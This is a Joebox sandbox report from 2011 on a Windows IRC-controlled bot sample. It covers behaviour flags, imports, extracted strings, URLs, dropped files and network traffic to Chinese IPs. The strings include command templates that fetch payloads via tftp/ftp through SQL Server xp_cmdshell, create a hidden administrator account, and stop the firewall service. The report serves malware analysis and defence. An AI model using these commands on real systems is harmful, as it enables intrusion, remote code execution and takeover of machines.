Joebox - Abstract Analysis File 6161

General information
Joebox version:	4.3.5
Start time:	16:49:53
Start date:	21/09/2011
Overall analysis duration:	0h 3m 14s
Target binary file name:	binary
Target script file name:	default.jbs
Number of analysed new started processes analysed:	27
Number of new started drivers analysed:	1
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Errors:

Summary
Binary contains device paths (device paths are often used for kernelmode <-> usermode communication)
Binary contains paths to debug symbols
Creates temporary files
Executes batch files
Printf formatting strings found in memory and binary data
Queries a list of all running processes
Spawns processes
Contains long sleeps (< 2min)
Creates a mutex to recognise infected hosts
Creates files inside the driver directory
Creates files inside the system directory
Creates files inside the user directory
Creates windows services
Downloads files
Performs DNS lookups
Uses net.exe to modify the status of services
Uses regedit.exe to modify the Windows registry
Checks for kernel debuggers (system query)
Checks the online ip address of the machine
Downloads files from webservers via HTTP
Entrypoint lies outside standard sections
PE file contains sections with non-standard names
Urls found in memory or binary data
Binary may include packed or crypted data
Modifies IRP (I/O request packets) handlers (IRP hooks)
Modifies the windows firewall
Relocates Windows system DLLs to bypass security applications
Spawns drivers
Uses IRC for communication with a C&C

Static File Information

PE Information

General
Entrypoint:	0x4824b2L	.ex_cod
Imagebase:	0x400000L
Time stamp:	0x4E22A7A9 [Sun Jul 17 09:13:13 2011 UTC]
Subsystem:	windows gui
TLS callbacks:

Resources
Name	RVA address	Size	Type

Imports
DLL	Import
KERNEL32.dll	VirtualFree, VirtualAlloc, ExitProcess, GetProcAddress, LoadLibraryExA, GetModuleHandleA, VirtualProtect, GetModuleFileNameA, GetLastError, CreateMutexA
USER32.dll	MessageBoxA
ADVAPI32.dll	GetUserNameA
USER32.dll	GetWindowThreadProcessId
MPR.dll	WNetAddConnection2A
SHELL32.dll	ShellExecuteExA
WS2_32.dll
iphlpapi.dll	GetAdaptersInfo
WININET.dll	FindNextUrlCacheEntryA
NETAPI32.dll	NetLocalGroupAddMembers
urlmon.dll	URLDownloadToFileA
MFC42.DLL
MSVCRT.dll	malloc
KERNEL32.dll	WriteFile

Exports

Sections
Name	Virtual address	Virtual size	Raw size	entropy
.data	0x1000L	0x76000L	0x0L	0.0
.pdata	0x77000L	0xa987L	0xa987L	7.99589487343
.ex_cod	0x82000L	0x1806L	0x180fL	6.47117828524

Version Infos
Description	Data

Possible Origin
Language of compilation system	Country where language is spoken	Map

String Analysis

Debug symbol paths
String value	Source
tcpip.pdb	pac_00603.tmp.dr, logo[1].gif.dr

Formattings for printf style functions
String value	Source
%s Error: %s.	binary.exe, smsc.exe
EXEC master..xp_cmdshell 'cmd /c tftp -i %s get %s &%s	binary.exe, smsc.exe
%f7A{[	binary.exe, smsc.exe
%s dl: %.1fKB to: %s @ %.1fKB/sec.	binary.exe, smsc.exe
%s %s a run: <%d>.	binary.exe, smsc.exe
\|%SystemRoot%\system32\rsvpsp.dll	binary.exe, smsc.exe
%ws%ws%Fws -	net1.exe
%SystemRoot%\Debug\UserMode\userenv.bak	cmd.exe, smsc.exe
-%s:%d, TCPSYN thread: %d, Sub-thread: %d.	binary.exe, smsc.exe
%s F to s %s, e: <%d>.	binary.exe, smsc.exe
t%SSSSh@	pac_00603.tmp.dr, logo[1].gif.dr
WB%dmC	binary.exe, smsc.exe
%s Sent IRC raw: "%s".	binary.exe, smsc.exe
USER %s * 0 :%s	binary.exe, smsc.exe
%SystemRoot%\Debug\UserMode\userenv.log	cmd.exe, smsc.exe
%-.ws\\%Fws	net1.exe
%s --> (%s:%s) for (%s secs).	binary.exe, smsc.exe
%d.x.x.x	binary.exe, smsc.exe
%s started.	binary.exe, smsc.exe
%s\drivers\tcpip.sys	binary.exe, smsc.exe
Connected to %s.	smsc.exe
MODE %s %s	binary.exe, smsc.exe
FTP directory %s at %s1<A HREF="..">Up to higher level directory</A><BR>	smsc.exe
: %s!%s@%s	binary.exe, smsc.exe
System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\%s\Connection	smsc.exe
DRIVER={SQL Server};SERVER=%s,%d;UID=%s;PWD=%s;%s	binary.exe, smsc.exe
FTP root at %s	smsc.exe
%s Server running on: %s:%i	binary.exe, smsc.exe
%s\%s\%s\%s\%s\%s	cmd.exe, smsc.exe
The website "%ls" has requested to save a file on your computer called a "cookie." This file may be used to track usage information. Do you want to allow this?	smsc.exe
%s %s out.	binary.exe, smsc.exe
%-.ws%-0.31ws %u.%u	net1.exe
%s Failed to start thread,error: (%d).	binary.exe, smsc.exe
%s:*:%s	binary.exe, smsc.exe
--GetMcast: %x %x	pac_00603.tmp.dr, logo[1].gif.dr
%s I: <%i>	binary.exe, smsc.exe
QUIT %s	binary.exe, smsc.exe
GET %s HTTP/1.1	smsc.exe
%s DL URL: %s to: %s.	binary.exe, smsc.exe
%SystemRoot%\System32\mswsock.dll	smsc.exe
%s\%s\%s\%s\%s	cmd.exe, smsc.exe
Already scanning with %d threads. Too many specified.	binary.exe, smsc.exe
%s bad form.	binary.exe, smsc.exe
%s Could not resolve hostname.	binary.exe, smsc.exe
%supsd_%d%d%d%d%d.exe	binary.exe, smsc.exe
Pw%n[w	smsc.exe
%ls %ls	cmd.exe, smsc.exe
Redialing in %d seconds.	smsc.exe
%d.%d.%d.%d	binary.exe, smsc.exe
A%emC{	smsc.exe
%s Lookup: %s -> %s.	binary.exe, smsc.exe
%s F to k t: <%s>	binary.exe, smsc.exe
%-.ws%u.%u	net1.exe
Portscan: %s:%d open.	binary.exe, smsc.exe
%s No L: <i>	binary.exe, smsc.exe
Assertion failed: %s, file %s, line %d	cmd.exe, smsc.exe
Cache%OLK*	cmd.exe
hwnd:%x text: %s Class: %s	binary.exe, smsc.exe
Algorithm %u	smsc.exe
sit thread: %d, Sub-thread: %d.	binary.exe, smsc.exe
%s "%s")	binary.exe, smsc.exe
PRIVMSG %s :%s	binary.exe, smsc.exe
%02d%s%02d%s	cmd.exe
%systemroot%\system32\com\dmp	smsc.exe
Finished at %s:%d after %d minute(s) of scanning.	binary.exe, smsc.exe
%02d%s%02d%s%02d	cmd.exe
-%s:%d, CCget thread: %d, Sub-thread: %d.	binary.exe, smsc.exe
%2d%s%02d%s%02d%s%02d	cmd.exe
CMD Internal Error %s	cmd.exe
%d %d %d %d	cmd.exe, smsc.exe
SC %s: exploiting (%s):%d, %s	binary.exe, smsc.exe
EXEC master..xp_cmdshell 'del z&cmd /c echo open %s %s > z&echo %s>> z&echo %s>> z&echo bin >> z&echo get %s >> z&echo quit >> z&ftp -n -s:z&del /F /Q z&%s	binary.exe, smsc.exe
\\%s\ipc$	binary.exe, smsc.exe
Ot%Ou3	pac_00603.tmp.dr, logo[1].gif.dr
Host: %s	smsc.exe
PONG %s	binary.exe, smsc.exe
cmd /c net user %s /del	binary.exe, smsc.exe
erJ `%I"	smsc.exe
cmd /c tftp -i %s get %s &%s	binary.exe, smsc.exe
PASS %s	binary.exe, smsc.exe
%s %s	cmd.exe
MODE %s %s %s	binary.exe, smsc.exe
%s Ip: %s Port: %d	binary.exe, smsc.exe
%s Failed to load dnsapi.dll.	binary.exe, smsc.exe
Failed to start scan thread, error: <%d>.	binary.exe, smsc.exe
Connected to remote computer.%Failed to connect to remote computer.	smsc.exe
-%s:%d, Scan thread: %d, Sub-thread: %d.	binary.exe, smsc.exe
%s error: <%d>	binary.exe, smsc.exe
%s --> (%s:%s).	binary.exe, smsc.exe
%s--%s	binary.exe, smsc.exe
%s.%s.%s.%s	binary.exe, smsc.exe
%s Port Scan started on %s:%d with a delay of %d seconds for %d minutes using %d threads.	binary.exe, smsc.exe
(%s) %s	cmd.exe
%s!%s@%s	binary.exe, smsc.exe
%s K t: <%s>	binary.exe, smsc.exe
%s List:	binary.exe, smsc.exe
%s Failed to flush DNS cache.	binary.exe, smsc.exe
Dialing attempt %d.	smsc.exe
JOIN %s	binary.exe, smsc.exe
Irp: %p Mdl: %p CompletionRoutine: %p	pac_00603.tmp.dr, logo[1].gif.dr
DragDrop%lx	cmd.exe, smsc.exe
NOTICE %s :%s	binary.exe, smsc.exe
PART %s	binary.exe, smsc.exe
%spac_%d%d%d%d%d.tmp	binary.exe, smsc.exe
%s %s!%s@%s (Tried: %s)	binary.exe, smsc.exe
%DvQd@v	smsc.exe
%s Created: "%s", PID: <%d>	binary.exe, smsc.exe
%s --> (%s:%s threads: %s url: %s) for (0 secs).	binary.exe, smsc.exe
ache%OLK*	cmd.exe
Ping Timeout? (%d-%d)%d/%d	binary.exe, smsc.exe
%SystemRoot%\System32\winrnr.dll	smsc.exe
%SystemRoot%\system32\mswsock.dll	smsc.exe
Failed to initialize critical section, error: <%d>	binary.exe, smsc.exe
NICK %s	binary.exe, smsc.exe
%s Cg: %s.	binary.exe, smsc.exe
%USERPROFILE%\Local Settings\History\History.IE5\MSHist012010021120100212\	smsc.exe
%-.ws%lu	net1.exe
-%s:, V	binary.exe, smsc.exe
%s dling from: %s to: %s.	binary.exe, smsc.exe
%s Failed: "%s", error: <%d>	binary.exe, smsc.exe
%s Prefix changed to: '%c'.	binary.exe, smsc.exe
err! %s.	binary.exe, smsc.exe
%s DNS cache flushed.	binary.exe, smsc.exe
%systemroot%\Registration	smsc.exe
%s %s t stp. (%d t(s) stp.)	binary.exe, smsc.exe
%s S: <%d> t(s).	binary.exe, smsc.exe
%d. %s	binary.exe, smsc.exe
%s End.	binary.exe, smsc.exe
%seme_%d%d%d%d%d.exe	binary.exe, smsc.exe
cmd /c net user %s /add && net user %s /active:yes && net user %s %s && net localgroup administrators %s /add && net1 user %s /add && net1 user %s /active:yes && net1 user %s %s && net1 localgroup administrators %s /add && net1 stop SharedAccess /y	binary.exe, smsc.exe
%Dvh%DvN%Dv4%Dv	smsc.exe
%s No %s t found.	binary.exe, smsc.exe
%-.ws%d	net1.exe
%s.bck	binary.exe, smsc.exe
\\%s\pipe\browser	binary.exe, smsc.exe
%s --> (%s)	binary.exe, smsc.exe
%s [+].	binary.exe, smsc.exe
%s\i%d%d%d%d%d.tmp	binary.exe, smsc.exe
-%s:%d, CC thread: %d, Sub-thread: %d.	binary.exe, smsc.exe
%s S <%i> out.	binary.exe, smsc.exe
%SystemRoot%\system32\rsvpsp.dll	binary.exe, smsc.exe
JOIN %s %s	binary.exe, smsc.exe
%s %s%s	cmd.exe
cmd /c echo open %s %s > i&echo %s>> i&echo %s>> i&echo bin >> i&echo get %s >> i&echo quit >> i&ftp -s:i&del /F /Q i&%s	binary.exe, smsc.exe

URLs
String value	Source
http://ad.doubleclick.net/ad/n4492.msn/b5014254.102;sz=1x1;ord=1094273351?	binary.exe
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/967.555.tk.100x25/1881686612	binary.exe
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/967.555.tk.100x25/438323964	binary.exe
http://ads1.msads.net/ads/1/0000000001_000000000000000017246.gif	binary.exe
http://ads1.msn.com/library/dapmsn.js	binary.exe
http://ads2.msads.net/cis/103/000/000/000/013/157.gif	binary.exe
http://ads2.msads.net/cis/110/000/000/000/005/545.jpg	binary.exe
http://ads2.msads.net/cis/29/000/000/000/016/401.swf?fd=www.msn.com&clicktag=http%3a//g.msn.com/2ad0004o/8000000000041466.1%3f%3fpid%3d8597644%26amp%3buit%3dg%26amp%3btargetid%3d8352780%26amp%3ban%3d1495272187%26amp%3bpg%3dmsnrec%26amp%3basid%3d130e1340f496469b80c05e29c8ff6858&clicktag=http%3a//g.msn.com/2ad0004o/8000000000041466.1%3f%3fpid%3d8597644%26amp%3buit%3dg%26amp%3btargetid%3d8352780%26amp%3ban%3d1495272187%26amp%3bpg%3dmsnrec%26amp%3basid%3d130e1340f496469b80c05e29c8ff6858	binary.exe
http://ads2.msads.net/cis/29/000/000/000/016/401.swf?fd=www.msn.com&clicktag=http%3a//g.msn.com/2ad0004o/8000000000041466.1%3f%3fpid%3d8597644%26amp%3buit%3dm%26amp%3btargetid%3d8352780%26amp%3ban%3d35340763%26amp%3bpg%3dmsnrec%26amp%3basid%3d72a1a83b9a7a4ac99a42244f3a4fa811&clicktag=http%3a//g.msn.com/2ad0004o/8000000000041466.1%3f%3fpid%3d8597644%26amp%3buit%3dm%26amp%3btargetid%3d8352780%26amp%3ban%3d35340763%26amp%3bpg%3dmsnrec%26amp%3basid%3d72a1a83b9a7a4ac99a42244f3a4fa811	binary.exe
http://analytics.atdmt.com/scripts/wlhelper.js?i=muid	binary.exe
http://analytics.live.com/analytics/wlanalytics.js	binary.exe
http://analytics.live.com/scripts/wlhelper.js?i=anid	binary.exe
http://analytics.live.com/sync.html?v=3525&aqnt=1	binary.exe
http://analytics.msn.com/include.html	binary.exe
http://api.bing.com/qsonhs.aspx?form=msn005&q=	binary.exe
http://armmf.adobe.com/arm-manifests/win/reader9manifest.msi	binary.exe
http://blst.msn.com/as/wea3/i/en-us/law/4.gif	binary.exe
http://check.acebug.eu	binary.exe, smsc.exe
http://check.torproject.org	binary.exe
http://check.torproject.org/	binary.exe
http://check.torproject.org/images/tor-on.png	binary.exe
http://checkip.dyndns.com	binary.exe, smsc.exe
http://checkip.dyndns.org	binary.exe, smsc.exe
http://checkip.dyndns.org:8245	binary.exe, smsc.exe
http://checkip.dyndns.org:8245/	smsc.exe
http://col.stb.s-msn.com/i/17/93bd9f74d272341c7744776d19e56.jpg	binary.exe
http://col.stb.s-msn.com/i/20/472783a8c4a986c2799c1071c67de5.jpg	binary.exe
http://col.stb.s-msn.com/i/26/b3ed6fb0e5138289959cb1ce87a61.jpg	binary.exe
http://col.stb.s-msn.com/i/2a/6b36d8f9c298a66fe07b11dcbe4a6f.jpg	binary.exe
http://col.stb.s-msn.com/i/30/af5f74b6d51fac8fa8622741bfc0.jpg	binary.exe
http://col.stb.s-msn.com/i/5b/85a3f8898a67bd65e846fae2bcb.jpg	binary.exe
http://col.stb.s-msn.com/i/5b/91886847ec879168b9a4704ffb632.jpg	binary.exe
http://col.stb.s-msn.com/i/71/8ec1ab995923948dd6b88109048ab.jpg	binary.exe
http://col.stb.s-msn.com/i/72/527c2e54a27c85ffd21fbcff2913cb.jpg	binary.exe
http://col.stb.s-msn.com/i/7b/bf8c239987b3572cfe5e92ba64c532.jpg	binary.exe
http://col.stb.s-msn.com/i/7f/7e964ba32abcd8676a36f1fb7df11c.jpg	binary.exe
http://col.stb.s-msn.com/i/a4/211c4a7dc216b447f95fe123e0c44f.jpg	binary.exe
http://col.stb.s-msn.com/i/b7/eb75d45b8948f72ee451223e95a96.gif	binary.exe
http://col.stb.s-msn.com/i/bd/faf88e45c7eacde432512f28e8e0.jpg	binary.exe
http://col.stb.s-msn.com/i/c5/ec3669ffd36ba892ba5c6050d63b.jpg	binary.exe
http://col.stb.s-msn.com/i/c8/da80e51da16aa5459b531f82d5e28a.jpg	binary.exe
http://col.stb.s-msn.com/i/ca/a853e4670dd793ff31a79e019ca.jpg	binary.exe
http://col.stb.s-msn.com/i/d4/9a74812bbfc377441863264afa439.jpg	binary.exe
http://col.stb.s-msn.com/i/e0/235f11926577772812f5ab32368fb.jpg	binary.exe
http://col.stb.s-msn.com/i/e2/37ba92e210d341bfdbf4126422a3d2.gif	binary.exe
http://col.stb.s-msn.com/i/e6/5c27da1fa142f84c79d56eb95fff.jpg	binary.exe
http://col.stc.s-msn.com/br/gbl/lg/csl/favicon.ico	binary.exe
http://col.stc.s-msn.com/br/sc/css/26/74ea93baa76cafc1f8b61460c107d1_fixed4.css	binary.exe
http://col.stc.s-msn.com/br/sc/i/07/617475cf39bf6f5c0bd6ecb985335c.gif	binary.exe
http://col.stc.s-msn.com/br/sc/i/0c/c57bc2a7d38843d7c4aa8028fc9f82.gif	binary.exe
http://col.stc.s-msn.com/br/sc/i/16/9798fea395258497f598bba500bf83.png	binary.exe
http://col.stc.s-msn.com/br/sc/i/94/8b0fe9bcd1399077fdc9374e5f314d.png	binary.exe
http://col.stc.s-msn.com/br/sc/i/c6/7980776cb684844c20339b839ac35e.gif	binary.exe
http://col.stc.s-msn.com/br/sc/i/f8/614595fba50d96389708a4135776e4.gif	binary.exe
http://col.stc.s-msn.com/br/sc/i/ff/adchoices_gif2.gif	binary.exe
http://col.stc.s-msn.com/br/sc/i/icons/bing_websearch_2.jpg	binary.exe
http://col.stj.s-msn.co	binary.exe
http://col.stj.s-msn.com/br/sc/js/b9/9640cd68629941a03dc55cb93c84e9.js	binary.exe
http://col.stj.s-msn.com/br/sc/js/jquery/jquery-1.4.2.min.js	binary.exe
http://download.synology.com	binary.exe, smsc.exe
http://ec.atdmt.com/b/cjcntcingaim/freerefurb_300x120_122810.jpg	binary.exe
http://fpdownload2.macromedia.com/get/flashplayer/update/current/xml/version_en_win_ax.xml	binary.exe
http://home.microsoft.com	binary.exe
http://itip1.inspice.com	binary.exe, smsc.exe
http://m.doubleclick.net/dot.gif	binary.exe
http://privacy.msn.com/w3c/p3p.xml	binary.exe
http://www.attracto.com/crossdomain.xml	binary.exe
http://www.attracto.com/geo/gaware.php?aid=372&client=ls2	binary.exe
http://www.bing.com/partner/primedns.gif	binary.exe
http://www.bing.com/s/as/899538/en.js	binary.exe
http://www.ip138.com/ips8.asp	binary.exe, smsc.exe
http://www.microsoft.com/schemas/	smsc.exe
http://www.msn.com	binary.exe
http://www.rsac.org/ratingsv01.html	binary.exe

Analysis Overview

Startup

system is xp

binary.exe (PID: 808 MD5: 9C0930A84D40CF3E57600CCF15C82794)

cmd.exe (PID: 1976 MD5: 6D778E0F95447E6546553EEEA709D03C)

net.exe (PID: 536 MD5: FD3DA8425624B98903407DF608CF2C11)

net1.exe (PID: 1756 MD5: 3F14C041342E3FBA343F2A1D11E74BBA)

cmd.exe (PID: 1188 MD5: 6D778E0F95447E6546553EEEA709D03C)

regedit.exe (PID: 1456 MD5: 058710B720282CA82B909912D3EF28DB)

cmd.exe (PID: 1960 MD5: 6D778E0F95447E6546553EEEA709D03C)

net.exe (PID: 1520 MD5: FD3DA8425624B98903407DF608CF2C11)

net1.exe (PID: 1528 MD5: 3F14C041342E3FBA343F2A1D11E74BBA)

cmd.exe (PID: 252 MD5: 6D778E0F95447E6546553EEEA709D03C)

net.exe (PID: 1452 MD5: FD3DA8425624B98903407DF608CF2C11)

net1.exe (PID: 728 MD5: 3F14C041342E3FBA343F2A1D11E74BBA)

smsc.exe (PID: 740 MD5: 9C0930A84D40CF3E57600CCF15C82794)

cmd.exe (PID: 1944 MD5: 6D778E0F95447E6546553EEEA709D03C)

net.exe (PID: 1468 MD5: FD3DA8425624B98903407DF608CF2C11)

net1.exe (PID: 592 MD5: 3F14C041342E3FBA343F2A1D11E74BBA)

cmd.exe (PID: 1292 MD5: 6D778E0F95447E6546553EEEA709D03C)

regedit.exe (PID: 1500 MD5: 058710B720282CA82B909912D3EF28DB)

cmd.exe (PID: 1692 MD5: 6D778E0F95447E6546553EEEA709D03C)

net.exe (PID: 1984 MD5: FD3DA8425624B98903407DF608CF2C11)

net1.exe (PID: 2348 MD5: 3F14C041342E3FBA343F2A1D11E74BBA)

cmd.exe (PID: 444 MD5: 6D778E0F95447E6546553EEEA709D03C)

net.exe (PID: 1928 MD5: FD3DA8425624B98903407DF608CF2C11)

net1.exe (PID: 2328 MD5: 3F14C041342E3FBA343F2A1D11E74BBA)

wscntfy.exe (PID: 532 MD5: F92E1076C42FCD6DB3D72D8CFE9816D5)

ipnat.sys (PID: 4 MD5: CC748EA12C6EFFDE940EE98098BF96BB)

alg.exe (PID: 1204 MD5: 8C515081584A38AA007909CD02020B3D)

alg.exe (PID: 2848 MD5: 8C515081584A38AA007909CD02020B3D)

cleanup

Dropped Files
File Path	MD5
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg	967D6DAE8EDABC983DBC05C2E1E66F25
C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\4V74E6Q7\logo[1].gif	A3886230C2B22BF4D3C452B90B1C45CB
C:\WINDOWS\Temp\7684d.reg	967D6DAE8EDABC983DBC05C2E1E66F25
C:\WINDOWS\Temp\pac_00603.tmp	A3886230C2B22BF4D3C452B90B1C45CB
C:\sdfeww.bat	8CA96BD1F501B655B5BD70B375C78462

Involved Domains
Name	IP	ASN	ASN Description	ANS State	Registrar	e-Mail
checkip.dyndns.org	91.198.22.70	AS33517	DYNDNS - Dynamic Network Services, Inc.	EU	unknown	unknown
53.159.185.81.in-addr.arpa	unknown	unknown	unknown	unknown	unknown	unknown

Involved IP Addresses
IP	ASN	ASN Description	ANS State
60.165.98.198	AS4134	CHINANET-BACKBONE No.31,Jin-rong Street	CN
58.240.104.57	AS4837	CHINA169-BACKBONE CNCGROUP China169 Backbone	CN
195.186.1.121	AS44038	BLUEWIN-AS Swisscom (Schweiz) AG	CH
195.186.4.121	AS44038	BLUEWIN-AS Swisscom (Schweiz) AG	CH

Global Network Data

All TCP
Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 21, 2011 16:50:58.928646000 CEST	1120	8685	192.168.0.10	60.165.98.198
Sep 21, 2011 16:50:58.928673000 CEST	8685	1120	60.165.98.198	192.168.0.10
Sep 21, 2011 16:50:58.929693000 CEST	1120	8685	192.168.0.10	60.165.98.198
Sep 21, 2011 16:50:58.945843000 CEST	1120	8685	192.168.0.10	60.165.98.198
Sep 21, 2011 16:50:58.945860000 CEST	8685	1120	60.165.98.198	192.168.0.10
Sep 21, 2011 16:50:58.947678000 CEST	1120	8685	192.168.0.10	60.165.98.198
Sep 21, 2011 16:50:58.947688000 CEST	8685	1120	60.165.98.198	192.168.0.10
Sep 21, 2011 16:51:29.514012000 CEST	8685	1120	60.165.98.198	192.168.0.10
Sep 21, 2011 16:51:29.515613000 CEST	1120	8685	192.168.0.10	60.165.98.198
Sep 21, 2011 16:51:29.515651000 CEST	8685	1120	60.165.98.198	192.168.0.10
Sep 21, 2011 16:51:30.907679000 CEST	8685	1120	60.165.98.198	192.168.0.10
Sep 21, 2011 16:51:31.025852000 CEST	1120	8685	192.168.0.10	60.165.98.198
Sep 21, 2011 16:51:31.038457000 CEST	1120	8685	192.168.0.10	60.165.98.198
Sep 21, 2011 16:51:31.038468000 CEST	8685	1120	60.165.98.198	192.168.0.10
Sep 21, 2011 16:51:31.048348000 CEST	1120	8685	192.168.0.10	60.165.98.198
Sep 21, 2011 16:51:31.048357000 CEST	8685	1120	60.165.98.198	192.168.0.10
Sep 21, 2011 16:51:31.118929000 CEST	1120	8685	192.168.0.10	60.165.98.198
Sep 21, 2011 16:51:31.118942000 CEST	8685	1120	60.165.98.198	192.168.0.10
Sep 21, 2011 16:51:32.158361000 CEST	8685	1120	60.165.98.198	192.168.0.10
Sep 21, 2011 16:51:32.335703000 CEST	1120	8685	192.168.0.10	60.165.98.198
Sep 21, 2011 16:51:32.335718000 CEST	8685	1120	60.165.98.198	192.168.0.10
Sep 21, 2011 16:51:32.555684000 CEST	1120	8685	192.168.0.10	60.165.98.198
Sep 21, 2011 16:51:43.861015000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:43.861044000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:43.864746000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:43.874105000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:43.874118000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:45.200853000 CEST	1123	8245	192.168.0.10	91.198.22.70
Sep 21, 2011 16:51:45.200880000 CEST	8245	1123	91.198.22.70	192.168.0.10
Sep 21, 2011 16:51:45.203987000 CEST	1123	8245	192.168.0.10	91.198.22.70
Sep 21, 2011 16:51:45.206536000 CEST	1123	8245	192.168.0.10	91.198.22.70
Sep 21, 2011 16:51:45.206550000 CEST	8245	1123	91.198.22.70	192.168.0.10
Sep 21, 2011 16:51:47.272379000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:47.429266000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:47.429285000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:47.538448000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:47.542929000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:47.570296000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:47.688406000 CEST	8245	1123	91.198.22.70	192.168.0.10
Sep 21, 2011 16:51:47.692178000 CEST	1123	8245	192.168.0.10	91.198.22.70
Sep 21, 2011 16:51:47.692237000 CEST	8245	1123	91.198.22.70	192.168.0.10
Sep 21, 2011 16:51:47.693047000 CEST	1123	8245	192.168.0.10	91.198.22.70
Sep 21, 2011 16:51:47.757058000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:47.757071000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:47.869039000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:47.870235000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:47.870249000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:48.084297000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:48.084312000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:48.291383000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:48.291880000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:48.291896000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:48.411866000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:48.411893000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:48.524092000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:48.524615000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:48.524630000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:48.646952000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:48.647641000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:48.647654000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:48.850542000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:48.850555000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:48.946316000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:48.947009000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:48.947023000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:49.069082000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:49.069096000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:49.286514000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:49.287881000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:49.287896000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:49.293100000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:49.346077000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:49.458929000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:49.459922000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:49.459936000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:49.537542000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:49.538281000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:49.538294000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:49.539990000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:49.558269000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:49.696410000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:49.697109000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:49.697123000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:49.834973000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:49.834986000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:50.053518000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:50.053534000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:50.271325000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:50.271339000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:50.490821000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:50.820589000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:50.918003000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:50.918652000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:50.918669000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:51.028758000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:51.033409000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:51.033424000 CEST	16778	1122	58.240.104.57	192.168.0.10
